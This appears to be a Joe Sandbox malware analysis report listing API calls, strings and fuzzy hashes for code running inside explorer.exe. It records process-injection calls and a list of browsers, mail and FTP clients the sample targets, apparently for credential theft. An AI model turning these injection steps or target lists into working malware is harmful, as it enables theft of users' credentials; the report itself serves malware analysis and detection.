lstrlenW.KERNEL32(00E56564,?,?,00E02F0C), ref: 00E01978
lstrcatW.KERNEL32(00000000,?,?,?,00E02F0C), ref: 00E01990
lstrcatW.KERNEL32(00000000,00E56564,?,?,00E02F0C), ref: 00E01994

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: lstrcatlstrlen
String ID:
API String ID: 1475610065-0
Opcode ID: ab751103bc84f7ed8749dd40178adadbe5e37c1710d4fe91443a9104a72c82de
Instruction ID: 27759eb49a889e3a28ad32d4d5f7fbf26a17b0605b26ab23071f98c4c223cfec
Opcode Fuzzy Hash: ab751103bc84f7ed8749dd40178adadbe5e37c1710d4fe91443a9104a72c82de
Instruction Fuzzy Hash: 06E0656230021D1B872477AE5C94D7B769DCAD97A57450079FA04E7242E9569C0946B0

Function 00E2F21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 00E06A81: memset.NTDLL ref: 00E06A9C

_aulldiv.NTDLL(?,00000000,?,00000000), ref: 00E2F2A1

Strings

%llu, xrefs: 00E2F25E
%llu, xrefs: 00E2F2A8

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: _aulldivmemset
String ID: %llu$%llu
API String ID: 714058258-4283164361
Opcode ID: ee4c38e4c76b39b94b44e21c5d4e016b7402bbb22a50a36f49a45b2c55671094
Instruction ID: f6b5404c104bd68fd73bf559b1b3b2a7268300a2a28e3e946328db59bc00fe43
Opcode Fuzzy Hash: ee4c38e4c76b39b94b44e21c5d4e016b7402bbb22a50a36f49a45b2c55671094
Instruction Fuzzy Hash: B8212972644215ABC710AA64DC42F6BB7A8EF81730F055638F921B72D1DB21EC5587F1

Function 00E1203C Relevance: 5.3, APIs: 4, Instructions: 274COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,?), ref: 00E12174
_allmul.NTDLL(?,?,?,00000000), ref: 00E1220E
_allmul.NTDLL(?,00000000,00000000,?), ref: 00E12241
_allmul.NTDLL(00E02E26,00000000,?,?), ref: 00E12295

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: _allmul
String ID:
API String ID: 4029198491-0
Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
Instruction ID: 6dd37b416836609889ac41644e24cb4e40901521ca3f01064e42ff8809e70e69
Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
Instruction Fuzzy Hash: 9BA18D707087019FC714DF64C891AAEB7E6AFD8704F00682CF655A7261EB71EC95CB42

Function 00E178B9 Relevance: 5.2, APIs: 4, Instructions: 227COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,?,?), ref: 00E17979
memset.NTDLL ref: 00E1798A
memcpy.NTDLL(?,?,?), ref: 00E17A00
memset.NTDLL ref: 00E17A14

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: memcpymemset
String ID:
API String ID: 1297977491-0
Opcode ID: 4cf9d8e63f2a26de6f7da103d50284d3077c94d3ee486983232fdb735734cb1a
Instruction ID: 3fd34944e9179eac4b7beabee4745ad706eee28e8cb53327342a4d042658d683
Opcode Fuzzy Hash: 4cf9d8e63f2a26de6f7da103d50284d3077c94d3ee486983232fdb735734cb1a
Instruction Fuzzy Hash: AF81707160C3149FC350DF28C884AABBBE5EFC8704F15596DF8C6A7252E670E989CB91

Function 00E0190B Relevance: 5.0, APIs: 4, Instructions: 36stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,?,?,00000000,00E02783), ref: 00E0192B
lstrlen.KERNEL32(00000000,?,?,?,00000000,00E02783), ref: 00E01930
lstrcat.KERNEL32(00000000,?), ref: 00E01946
lstrcat.KERNEL32(00000000,00000000), ref: 00E0194A

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: lstrcatlstrlen
String ID:
API String ID: 1475610065-0
Opcode ID: afc614446ce43f9a033508d4becec1d779ff92423ab742ab01f1051048eba1cb
Instruction ID: 2a105e66d4f703c37d59d854132696d017fbbdc9558df8e6a5e7a8addb9a1fe9
Opcode Fuzzy Hash: afc614446ce43f9a033508d4becec1d779ff92423ab742ab01f1051048eba1cb
Instruction Fuzzy Hash: 73E09B5230031C1B473577AE5C94D7B76DDCAD57A63450175FD04E7202ED559C0546B0

Analysis Process: explorer.exePID: 4116, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	21.6%
Dynamic/Decrypted Code Coverage:	87.3%
Signature Coverage:	0%
Total number of Nodes:	181
Total number of Limit Nodes:	17

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 001D30A8 Relevance: 4.7, APIs: 3, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE ref: 001D3104
FindNextFileW.KERNELBASE ref: 001D3218
FindClose.KERNELBASE ref: 001D3229

Memory Dump Source

Source File: 0000000E.00000002.2874598553.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d1000_explorer.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
Instruction ID: e0725c67f65c2af896ee9c226cd1d219abb0b36e30746fbc7e31b979eb80c14b
Opcode Fuzzy Hash: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
Instruction Fuzzy Hash: 5D417330718B4D5FDB54EB3894597AA73D2FBE8340F444A2AE45AC3391EF78D9048782

Function 001D38B0 Relevance: 1.5, APIs: 1, Instructions: 40
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 001D38F2

Memory Dump Source

Source File: 0000000E.00000002.2874598553.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d1000_explorer.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
Instruction ID: d7afa70458a50b82f9b773229a29cc8fc1395a10b81e4b2ece8b65aa48b439dc
Opcode Fuzzy Hash: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
Instruction Fuzzy Hash: 9AF0A030F11A082BEA6C77BD685D3282280EB68310F90062BB525C33E2DE398A458302

Function 001D2774 Relevance: 6.1, APIs: 4, Instructions: 124
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE ref: 001D27C7
RegQueryValueExW.KERNELBASE ref: 001D27F4
RegQueryValueExW.KERNELBASE ref: 001D283A
RegCloseKey.KERNELBASE ref: 001D2860

Part of subcall function 001D1860: RtlFreeHeap.NTDLL ref: 001D1880

Memory Dump Source

Source File: 0000000E.00000002.2874598553.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d1000_explorer.jbxd

Similarity

API ID: QueryValue$CloseFreeHeapOpen
String ID:
API String ID: 1641618270-0
Opcode ID: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
Instruction ID: 4e7e998e761750d41a5a54e5edd1ea72fde0c9c61537ead481fb8b03583dcee9
Opcode Fuzzy Hash: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
Instruction Fuzzy Hash: 7A316E30208B488FE769DB28D45877ABBD0FBB8355F54062FE49AC3264DF34D8469742

Function 001D372C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNELBASE ref: 001D37B2
RegCloseKey.KERNELBASE ref: 001D37C1

Strings

?, xrefs: 001D37A2

Memory Dump Source

Source File: 0000000E.00000002.2874598553.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d1000_explorer.jbxd

Similarity

API ID: CloseCreate
String ID: ?
API String ID: 2932200918-1684325040
Opcode ID: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
Instruction ID: b182950bdd00a600025b031e3234daaaa3e588dabaa9d198138e844f566c4a8f
Opcode Fuzzy Hash: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
Instruction Fuzzy Hash: 18116070618B488FD751DF69D48866AB7E1FB98345F50062FE48AC3360DF389985CB82

Function 001DA298 Relevance: 4.8, APIs: 3, Instructions: 252
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 001DA397
VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 001DA441
VirtualProtect.KERNELBASE ref: 001DA45F

Memory Dump Source

Source File: 0000000E.00000002.2874598553.00000000001D9000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d9000_explorer.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
Instruction ID: 5768982b0f36e44076531008775d5e4297576efe290e56356b008267c4342c97
Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
Instruction Fuzzy Hash: 7351463275891D5BCB28EA7C98942F5B7D2FF59321B98062BC49AC3384D759D8468383

Function 001D3254 Relevance: 4.7, APIs: 3, Instructions: 210
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001D298C: GetFileAttributesW.KERNELBASE ref: 001D299E

GetPrivateProfileSectionNamesW.KERNEL32 ref: 001D330F
GetPrivateProfileStringW.KERNEL32 ref: 001D336F
GetPrivateProfileIntW.KERNEL32 ref: 001D338C

Part of subcall function 001D30A8: FindFirstFileW.KERNELBASE ref: 001D3104

Part of subcall function 001D1860: RtlFreeHeap.NTDLL ref: 001D1880

Memory Dump Source

Source File: 0000000E.00000002.2874598553.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d1000_explorer.jbxd

Similarity

API ID: PrivateProfile$File$AttributesFindFirstFreeHeapNamesSectionString
String ID:
API String ID: 970345848-0
Opcode ID: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
Instruction ID: e98378272e2651de6e2753318e27cd1a63479545120386f18f59f783f6cf2a44
Opcode Fuzzy Hash: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
Instruction Fuzzy Hash: AA51B430718F195BEB59BB2C985667972D2FBA8300B44056FE41AC3396EF78DD428387

Function 001D3458 Relevance: 4.7, APIs: 3, Instructions: 172
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIW.KERNELBASE ref: 001D347E
RegOpenKeyExW.KERNELBASE ref: 001D353F
RegEnumKeyExW.KERNELBASE ref: 001D35D6

Part of subcall function 001D2774: RegOpenKeyExW.KERNELBASE ref: 001D27C7
Part of subcall function 001D2774: RegQueryValueExW.KERNELBASE ref: 001D27F4
Part of subcall function 001D2774: RegQueryValueExW.KERNELBASE ref: 001D283A
Part of subcall function 001D2774: RegCloseKey.KERNELBASE ref: 001D2860

Part of subcall function 001D3254: GetPrivateProfileSectionNamesW.KERNEL32 ref: 001D330F

Part of subcall function 001D1860: RtlFreeHeap.NTDLL ref: 001D1880

Memory Dump Source

Source File: 0000000E.00000002.2874598553.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d1000_explorer.jbxd

Similarity

API ID: OpenQueryValue$CloseEnumFreeHeapNamesPrivateProfileSection
String ID:
API String ID: 1841478724-0
Opcode ID: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
Instruction ID: 0e33bd0f8b213b7608e1a87d3074433987aa4d794f61a9af5e539c9510e7d4fa
Opcode Fuzzy Hash: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
Instruction Fuzzy Hash: A7414830718B484FDB98EF6D949972AB6E2FBA8341F00496FA55EC3361DF34D9448B42

Function 001D2938 Relevance: 3.0, APIs: 2, Instructions: 34
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 001D2966
CloseHandle.KERNELBASE ref: 001D297A

Memory Dump Source

Source File: 0000000E.00000002.2874598553.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d1000_explorer.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
Instruction ID: 264686b8a3205558d5275380e21c4bc67fa738683c4cb186f0059383a4edd806
Opcode Fuzzy Hash: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
Instruction Fuzzy Hash: 5CF0E57021571A8FE7486FB844A8336F5D0FB18319F18463EE46AC23D0D77888428702

Function 001D22B4 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE ref: 001D22D0

Memory Dump Source

Source File: 0000000E.00000002.2874598553.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d1000_explorer.jbxd

Similarity

API ID: CreateGlobalStream
String ID:
API String ID: 2244384528-0
Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
Instruction ID: 90f727c0e57445b95457ab55e376c8520b97de21b185cfb7d751038cfe3d5542
Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
Instruction Fuzzy Hash: 50E08C30108B0A8FD758AFBCE4CA07A33A1EBAC252B05053FE005CB114D27988C18741

Function 001D298C Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE ref: 001D299E

Memory Dump Source

Source File: 0000000E.00000002.2874598553.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d1000_explorer.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
Instruction ID: c92bfb55fac26fb4ccd0511eb5877d43910f68b3fb52d136159fb6de357868a1
Opcode Fuzzy Hash: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
Instruction Fuzzy Hash: 1CD05E22612915076B6C26F908E927120A0D73932EB94022BEA36C13A0E3A5C895A201

Function 001D1860 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL ref: 001D1880

Memory Dump Source

Source File: 0000000E.00000002.2874598553.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d1000_explorer.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
Instruction ID: 40d4adad595331773e2bc96fd1c17638c7bb9a22ed4221692365951983957922
Opcode Fuzzy Hash: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
Instruction Fuzzy Hash: 23D01224716A042BEF2CBBFE2C8D1747AD2E768212B588066B819C3352EE3DC895C341

Analysis Process: explorer.exePID: 6112, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	97.4%
Signature Coverage:	17.3%
Total number of Nodes:	306
Total number of Limit Nodes:	42

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00B41016 Relevance: 87.7, APIs: 30, Strings: 20, Instructions: 244
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B42608: VirtualQuery.KERNEL32(00B44434,?,0000001C), ref: 00B42615

Part of subcall function 00B42861: GetProcessHeap.KERNEL32(00000008,0000A000,00B410CC), ref: 00B42864
Part of subcall function 00B42861: RtlAllocateHeap.NTDLL(00000000), ref: 00B4286B

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00B41038
RtlMoveMemory.NTDLL(00000000,?,?), ref: 00B4106B
NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00B41074
GetCurrentProcessId.KERNEL32(?,00B41010), ref: 00B4107A
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B410DF
Process32First.KERNEL32(00000000,?), ref: 00B410FE
lstrcmpiA.KERNEL32(?,firefox.exe), ref: 00B4111A
lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 00B4112E
lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00B41142
lstrcmpiA.KERNEL32(?,opera.exe), ref: 00B41156
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00B41166
lstrcmpiA.KERNEL32(?,outlook.exe), ref: 00B4117A
lstrcmpiA.KERNEL32(?,thebat.exe), ref: 00B4118E
lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 00B411A2
lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 00B411B6
lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 00B411CA
lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 00B411DE
lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 00B411F2
lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00B41206
lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00B41216
lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00B41226
lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00B41236
lstrcmpiA.KERNEL32(?,263em.exe), ref: 00B41246
lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00B41256
lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00B41266
lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00B41276
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00B412B4
Process32Next.KERNEL32(00000000,00000128), ref: 00B4130B
CloseHandle.KERNELBASE(00000000), ref: 00B4131C
Sleep.KERNELBASE(000003E8), ref: 00B41327

Strings

cuteftppro.exe, xrefs: 00B4121C
firefox.exe, xrefs: 00B41114
opera.exe, xrefs: 00B4114C
microsoftedgecp.exe, xrefs: 00B410D2, 00B41160, 00B412AE
thebat64.exe, xrefs: 00B411AC
foxmail.exe, xrefs: 00B4124C
filezilla.exe, xrefs: 00B411D4
iexplore.exe, xrefs: 00B41124
mailmaster.exe, xrefs: 00B4122C
winscp.exe, xrefs: 00B411FC
263em.exe, xrefs: 00B4123C
thebat.exe, xrefs: 00B41184
smartftp.exe, xrefs: 00B411E8
alimail.exe, xrefs: 00B4125C
outlook.exe, xrefs: 00B41170
thebat32.exe, xrefs: 00B41198
flashfxp.exe, xrefs: 00B4120C
mailchat.exe, xrefs: 00B4126C
thunderbird.exe, xrefs: 00B411C0
chrome.exe, xrefs: 00B41138

Memory Dump Source

Source File: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b41000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
API String ID: 2555639992-1680033604
Opcode ID: 25345c3575dda05c95a0a615fbea6909ae72c7ddc6c51a59a247399ac645c9a6
Instruction ID: 04c99a0b1ab41cd8b2acd1f00d21d3abfda49a8d817c73e34f4b2b7a21f11aec
Opcode Fuzzy Hash: 25345c3575dda05c95a0a615fbea6909ae72c7ddc6c51a59a247399ac645c9a6
Instruction Fuzzy Hash: 41719330A01345ABCB10DFB49C45F6A7BECFF46B80B080AA9F940C3191DF65DB45AA79

Function 00B410A4 Relevance: 80.7, APIs: 26, Strings: 20, Instructions: 203
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B42861: GetProcessHeap.KERNEL32(00000008,0000A000,00B410CC), ref: 00B42864
Part of subcall function 00B42861: RtlAllocateHeap.NTDLL(00000000), ref: 00B4286B

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B410DF
Process32First.KERNEL32(00000000,?), ref: 00B410FE
lstrcmpiA.KERNEL32(?,firefox.exe), ref: 00B4111A
lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 00B4112E
lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00B41142
lstrcmpiA.KERNEL32(?,opera.exe), ref: 00B41156
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00B41166
lstrcmpiA.KERNEL32(?,outlook.exe), ref: 00B4117A
lstrcmpiA.KERNEL32(?,thebat.exe), ref: 00B4118E
lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 00B411A2
lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 00B411B6
lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 00B411CA
lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 00B411DE
lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 00B411F2
lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00B41206
lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00B41216
lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00B41226
lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00B41236
lstrcmpiA.KERNEL32(?,263em.exe), ref: 00B41246
lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00B41256
lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00B41266
lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00B41276
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00B412B4
Process32Next.KERNEL32(00000000,00000128), ref: 00B4130B
CloseHandle.KERNELBASE(00000000), ref: 00B4131C
Sleep.KERNELBASE(000003E8), ref: 00B41327

Strings

cuteftppro.exe, xrefs: 00B4121C
firefox.exe, xrefs: 00B41114
opera.exe, xrefs: 00B4114C
microsoftedgecp.exe, xrefs: 00B410D2, 00B41160, 00B412AE
thebat64.exe, xrefs: 00B411AC
foxmail.exe, xrefs: 00B4124C
filezilla.exe, xrefs: 00B411D4
iexplore.exe, xrefs: 00B41124
mailmaster.exe, xrefs: 00B4122C
winscp.exe, xrefs: 00B411FC
263em.exe, xrefs: 00B4123C
thebat.exe, xrefs: 00B41184
smartftp.exe, xrefs: 00B411E8
alimail.exe, xrefs: 00B4125C
outlook.exe, xrefs: 00B41170
thebat32.exe, xrefs: 00B41198
flashfxp.exe, xrefs: 00B4120C
mailchat.exe, xrefs: 00B4126C
thunderbird.exe, xrefs: 00B411C0
chrome.exe, xrefs: 00B41138

Memory Dump Source

Source File: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b41000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
API String ID: 3950187957-1680033604
Opcode ID: ae304881ae8bee5086e7485ad3bad91c1629d655ac9bdef6ce430c75ff1a1742
Instruction ID: 5b9eb9413fb397074cb1fbe27022fe5110e71e401d20d87f95614f7e3b87c8c2
Opcode Fuzzy Hash: ae304881ae8bee5086e7485ad3bad91c1629d655ac9bdef6ce430c75ff1a1742
Instruction Fuzzy Hash: CC51A471A04305A6DB00DFB58C85F6F7BECAF45B80B480EA9F940C3190EF64DB45AA79

Function 00B47728 Relevance: 6.2, APIs: 4, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.4138340959.0000000000B46000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B46000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b46000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25591f01ca5ec2c248db010ad09f19e55b88aea9cb05b3ceac55c40658514109
Instruction ID: c49f20a1fb5496f0e51d5e57846ffdc6888f462882b14c09b76c95df5691eadf
Opcode Fuzzy Hash: 25591f01ca5ec2c248db010ad09f19e55b88aea9cb05b3ceac55c40658514109
Instruction Fuzzy Hash: 0451087198C3924FD7218A78CCD46A07BE0DB52320B5906F9C5E5CB3C6EF945E05E7A1

Function 00B42861 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,0000A000,00B410CC), ref: 00B42864
RtlAllocateHeap.NTDLL(00000000), ref: 00B4286B

Memory Dump Source

Source File: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b41000_explorer.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: e08572738de17633817dfb78fa8009473990d8d2f220303060e31a19a1ad71a2
Instruction ID: f125300b1fd9c49c925768133ab0ab383e4faea7bf8c605a810a16bdfb36dad8
Opcode Fuzzy Hash: e08572738de17633817dfb78fa8009473990d8d2f220303060e31a19a1ad71a2
Instruction Fuzzy Hash: C7A012744001007FDD5027E0AC0DF053A59B742B01F0402007109C6160CD64034C8721

Non-executed Functions

Function 00B41819 Relevance: 47.5, APIs: 23, Strings: 4, Instructions: 208
injectionnativesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B42608: VirtualQuery.KERNEL32(00B44434,?,0000001C), ref: 00B42615

OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,74DEE800,microsoftedgecp.exe,?), ref: 00B4184E
NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00B41889
NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00B41919
RtlMoveMemory.NTDLL(00000000,00B43428,00000016), ref: 00B41940
RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00B41968
NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00B41978
CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B41992
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 00B4199A
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00B419A8
Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00B419AF
